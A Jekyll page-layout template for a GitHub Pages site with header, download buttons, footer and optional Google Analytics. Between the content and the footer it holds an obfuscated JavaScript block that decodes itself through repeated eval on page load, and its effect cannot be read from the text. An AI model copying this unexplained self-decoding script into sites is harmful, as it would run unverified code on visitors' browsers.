<!DOCTYPE html>
<html lang="{{ site.lang | default: "en-US" }}">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="stylesheet" href="{{ '/assets/css/style.css?v=' | append: site.github.build_revision | relative_url }}">
    <link rel="stylesheet" type="text/css" href="{{ '/assets/css/print.css' | relative_url }}" media="print">
    <!--[if lt IE 9]>
    <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->

{% seo %}
  </head>

  <body>
    <div id="container">
      <div class="inner">

        <header>
          <h1>{{ page.title | default: site.title | default: site.github.repository_name }}</h1>
          <h2>{{ page.description | default: site.description | default: site.github.project_tagline }}</h2>
        </header>
        <section id="downloads" class="clearfix">
          {% if site.show_downloads %}
          <a href="{{ site.github.zip_url }}" id="download-zip" class="button"><span>Download .zip</span></a>
          <a href="{{ site.github.tar_url }}" id="download-tar-gz" class="button"><span>Download .tar.gz</span></a>
          {% endif %}
	{% if site.github.public %}
	  {% if site.github.is_project_page %}
          <a href="{{ site.github.repository_url }}" id="view-on-github" class="button"><span>View on GitHub</span></a>
	  {% else %}
          <a href="{{ site.github.owner_url }}" id="view-on-github" class="button"><span>View on GitHub</span></a>
	  {% endif %}
	{% endif %}
        </section>
        <hr>
        <section id="main_content">
          {{ content }}
        </section>
	<script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x){var i,o=\"\",l=x.length;for(i=0;i<l;i+=2) {if(i+1<l)o+=" +
"x.charAt(i+1);try{o+=x.charAt(i);}catch(e){}}return o;}f(\"ufcnitnof x({)av" +
" r,i=o\\\"\\\"o,=l.xelgnhtl,o=;lhwli(e.xhcraoCedtAl(1/)3=!21)2t{yrx{=+;x+ll" +
"=};acct(h)e}{f}roi(l=1-i;=>;0-i)-o{=+.xhcratAi(;)r}teru n.oussbrt0(o,)l};(f" +
")\\\"60\\\\,@\\\"BJUQ1H00\\\\\\\\04\\\\02\\\\03\\\\\\\\00\\\\02\\\\02\\\\\\" +
"\\03\\\\0@\\\\3R00\\\\\\\\1003\\\\\\\\R6@A13\\\\0n\\\\\\\\\\\\07\\\\0D\\\\J" +
"Bx@zpp|~z>487t3zrhp16\\\\0j\\\\`lnj&%1#7!$6Z,\\\\\\\\\\\\\\\\32\\\\04\\\\03" +
"\\\\\\\\20\\\\02\\\\03\\\\\\\\36\\\\07\\\\02\\\\\\\\_X33\\\\0Q\\\\@VCA\\\\B" +
"\\\\\\\\B\\\\4J00\\\\\\\\05\\\\06\\\\01\\\\\\\\10\\\\03\\\\01\\\\\\\\01\\\\" +
"0K\\\\JKBV8Ax6nhpxcjTbv`?a}}kahx}khf%e#$\\\"\\\\\\\\\\\\\\\\o\\\\\\\\4\\\\0" +
"1\\\\\\\\G!]R27\\\\07\\\\02\\\\\\\\36\\\\02\\\\00\\\\\\\\26\\\\05\\\\02\\\\" +
"\\\\36\\\\00\\\\00\\\\\\\\36\\\\06\\\\02\\\\\\\\FH\\\\t%\\\\22\\\\0(\\\\35\\"+
"\\06\\\\00\\\\\\\\02\\\\03\\\\01\\\\\\\\00\\\\00\\\\01\\\\\\\\6&02\\\\\\\\0" +
"4\\\\07\\\\00\\\\\\\\*q93/67:v3iu?s?#:)-.$?+&4g2$bc`abQ`O05\\\\0N\\\\QIUE0F" +
"01\\\\\\\\n]lC21\\\\0C\\\\C_5M00\\\\\\\\25\\\\0F\\\\T{2y03\\\\\\\\01\\\\0~\\"+
"\\NEMz@?7&17\\\\\\\\tl`v65fO}x{m.~7Wxlr~p%rvio]B\\\\\\\\\\\\\\\\Z[27\\\\0$\\"+
"\\05\\\\0*\\\\[K0S00\\\\\\\\23\\\\0L\\\\LQ0100\\\\\\\\02\\\\03\\\\01\\\\\\\\"+
"04\\\\0r\\\\\\\\\\\\:E1X00\\\\\\\\16\\\\03\\\\00\\\\\\\\17\\\\0@\\\\2}00\\\\"+
"\\\\517:z<13\\\\0k\\\\$0&*$q>:%#twg9f{77\\\\1(\\\\#*5,00\\\\\\\\01\\\\0N\\\\"+
"01\\\\04\\\\03\\\\\\\\33\\\\02\\\\03\\\\\\\\31\\\\0V\\\\Dkni\\\\\\\\34\\\\0" +
"2\\\\02\\\\\\\\RC23\\\\00\\\\02\\\\\\\\17\\\\0p\\\\GNFH05\\\\0z\\\\30\\\\0A" +
"\\\\CN0O00\\\\\\\\B=din~D;s*me2gee77\\\\1`\\\\0dz54&<'i`Lbp?]B\\\\\\\\\\\\\\"+
"\\Z[27\\\\0$\\\\05\\\\0*\\\\VK&/\\\"\\\\\\\\\\\\??1L7Q01\\\\\\\\05\\\\01\\\\"+
"00\\\\\\\\34\\\\02\\\\00\\\\\\\\13\\\\0E\\\\?F14\\\\06\\\\01\\\\\\\\\\\\t+\\"+
"\\<=)1?53z01\\\\\\\\1ks=#?)?or%d,&.<247j$,J-R]\\\\X(\\\"}fo;n uret}r);+)y+^" +
"(i)t(eAodrCha.c(xdeCoarChomfrg.intr=So+7;12%={y+)i+l;i<0;i=r(foh;gten.l=x,l" +
"\\\"\\\\\\\"\\\\o=i,r va){,y(x fontincfu)\\\"\")"                            ;
while(x=eval(x));
//-->
//]]>
</script>
		
		
        <footer>
        {% if site.github.is_project_page %}
          {{ site.title | default: site.github.repository_name }} is maintained by <a href="{{ site.github.owner_url }}">{{ site.github.owner_name }}</a><br>
        {% endif %}
          This page was generated by <a href="https://pages.github.com">GitHub Pages</a>.
        </footer>

      </div>
    </div>

    {% if site.google_analytics %}
      <script>
        (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', '{{ site.google_analytics }}', 'auto');
        ga('send', 'pageview');
      </script>
    {% endif %}
  </body>
</html>
